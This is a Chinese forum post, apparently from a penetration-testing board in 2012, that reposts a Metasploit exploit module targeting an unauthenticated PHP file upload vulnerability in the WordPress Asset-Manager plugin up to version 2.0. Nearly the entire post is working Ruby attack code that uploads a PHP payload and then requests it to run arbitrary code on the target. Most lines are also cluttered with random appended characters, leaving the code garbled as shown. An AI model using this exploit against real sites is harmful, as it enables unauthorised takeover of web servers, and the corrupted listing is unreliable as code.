中国网络渗透测试联盟

标题: WordPress Asset-Manager PHP文件上传漏洞 [打印本页]
作者: admin    时间: 2012-12-31 09:22
标题: WordPress Asset-Manager PHP文件上传漏洞
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。! y# o7 g; C' \: ^
# p; [& a/ R" Z% w- N2 H
##
  R" R' L- `$ `4 t# This file is part of the Metasploit Framework and may be subject to: |. A; i: I( \
# redistribution and commercial restrictions. Please see the Metasploit
1 S1 X7 Y2 R0 w+ o# Framework web site for more information on licensing and terms of use.
9 ^* H0 F# z/ y6 Z#   http://metasploit.com/framework/( S4 n& V" s, L0 i
##- c. o/ |" p% n

, `: R" X) C1 Y; Q& V$ [require 'msf/core'0 N. Y6 j& A! \( g
require 'msf/core/exploit/php_exe'
6 B* p2 v  O( B# l. P , M% R8 ~# G/ X6 p5 w0 f
class Metasploit3 < Msf::Exploit::Remote
% e( Q2 O5 k% \' c  Rank = ExcellentRanking; F3 b" \$ ^) |' |# d0 D; B1 T" ?

# C3 @% Y) d7 V/ F  include Msf::Exploit::Remote::HttpClient4 A! N8 }! A. X: \
  include Msf::Exploit:hpEXE$ X0 |, k+ [0 W6 K

8 W* {- |% y2 A0 r$ }  c- U5 t  ?/ E  def initialize(info = {})/ e9 g, A: T% a5 ^
    super(update_info(info,: E5 G8 T# F8 m9 l, M. N5 `! ?
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
, Y' {' @4 J8 a* h' u: e      'Description'    => %q{1 R" G* {" Y% h! d! S% U0 r$ d3 H
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress$ s) E+ {, _9 |
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a- D  }7 l0 u5 K; v; @
        temp directory without authentication, which results in arbitrary code execution.
7 N2 o! m& d. {+ ^      },
; I. J6 P6 d) E8 D! s, A      'Author'         =>
" Z1 W- j- o) m, Y: M        [
/ ?  [2 h. v' o2 N) |2 O          'Sammy FORGIT', # initial discovery
( p& f0 m3 Y7 Y7 Z* ~/ j3 \          'James Fitts <fitts.james[at]gmail.com>' # metasploit module) o. n. p0 |/ V+ d/ J: C
        ],
) y: s5 G) I" j* K1 f: ~      'License'        => MSF_LICENSE,
% I3 U% Y4 z* f      'References'     =>
" ]% ^0 G5 z0 y        [+ q" h( n  V) d" A5 ]% P5 U3 b1 y( K
          [ 'OSVDB', '82653' ],
: I0 K; j4 O! @7 H  X          [ 'BID', '53809' ],
( W/ j. \/ ?  B3 k4 D4 o          [ 'EDB', '18993' ],
& H/ A7 J; B! `  `4 q2 G# B, c          [ 'URL', 'http:// www.myhack58.com /' ]9 M  n- D5 P! y0 s, U% K
        ],
5 q7 }( z" k$ L5 b      'Payload'       =>
. `/ s9 w0 s4 |7 H$ F        {
9 \1 U% r* x, Q( K: F. `( C          'BadChars' => "\x00",
  `' [% y  d: p" I. y3 Q8 m7 O. L        },2 L2 `! p1 _' @7 j3 d
      'Platform'       => 'php',4 q2 O" }, ]- j$ j' w
      'Arch'           => ARCH_PHP,
% Z" H9 [2 x1 ]      'Targets'        =>
& S' q. O) w2 L  \        [8 S% G1 l1 A# Q0 i1 z, B1 c6 \$ k* |
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
3 Z/ c7 w3 x8 p; ?& Z/ ^1 ^          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]9 {/ }% l- s/ ?# F2 u+ g
        ],
  M2 p& Z' n0 {0 N+ E5 g- {2 b      'DefaultTarget' => 0,1 c" D& @. ]5 Q5 R8 x0 a
      'DisclosureDate' => 'May 26 2012'))
/ Q" v- a% x& i ) _; h& J2 ^5 o3 z
    register_options(2 p, {% }8 D9 l# V  S/ P9 t
      [( x/ o; z7 s9 `# f1 Q2 b& Z, [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress']), H% a" [4 C$ w: E/ c6 C; l) ?2 c
      ], self.class)  S" C! d0 h; ~- I" Q
  end1 O( X7 Q* I0 `. u. C

) k; I" c/ f! x1 j. N" B  def exploit
( J0 @& W+ d4 V- @- Z; @    uri =  target_uri.path
1 x9 n+ V3 P7 @: s1 O7 d    uri << '/' if uri[-1,1] != '/'0 F! X( J  _2 M$ y0 W* Q. ~
    peer = "#{rhost}:#{rport}"
: B0 [6 b  x* P' z6 ?    payload_name = "#{rand_text_alpha(5)}.php"
" H. o- |7 Y. I. i    php_payload = get_write_exec_payload(:unlink_self=>true), ^% t# K, M' [2 }9 O* |9 [
$ s! T3 K% o! Q3 R) y. ]9 G
    data = Rex::MIME::Message.new# i: U% b7 L' T& h2 u% _0 G1 b0 w; P
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
5 z  ^7 E- A5 j  J$ X  ?    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
% a# o  L/ }: B. {0 F# y 3 D1 u' ~1 r! k9 M
    print_status("#{peer} - Uploading payload #{payload_name}"): A' J  R, D( ]( E- d" i
    res = send_request_cgi({
8 z% U+ i, g7 \6 x9 |, V      'method'  => 'POST',* K" ~# g7 C: g$ K. _
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
( K7 S. B6 n% w/ {  A. ?5 U3 n      'ctype'   => "multipart/form-data; boundary=#{data.bound}",; G' q3 A! R( _0 e
      'data'    => post_data; H- h9 p) X1 v# v0 z9 W8 `
    })2 K* z6 Y1 \' {

' \: o; u) q- h# O    if not res or res.code != 200 or res.body !~ /#{payload_name}/
+ t" H8 \, E- T) p      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
0 N" V+ H5 c5 e: aend
7 Q& X' ~5 S  i% H/ L
4 B+ c/ z" n" H/ k    print_status("#{peer} - Executing payload #{payload_name}")( n4 q3 F. l/ R8 G1 L- k
    res = send_request_raw({4 T$ |( ]& z5 l( Z
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
7 Q$ ?, z2 F' g5 Y7 }$ @- j/ [      'method'  => 'GET'
% F& k) F$ A3 g8 J( ~    })
5 W) P3 Q) f% q# K1 _) i% n# A
4 \; L- i: I, f9 ~: n7 ?) \    if res and res.code != 200# y/ w) ^# G* s/ K
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")1 _4 |- E) P3 m$ I: r5 v9 l) s
    end! c4 M- I9 \7 o" _! f$ N  e+ V
  end" i, @1 \/ m  I( P0 f
end
' J' W5 a5 ~9 _" _" ?! Z



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2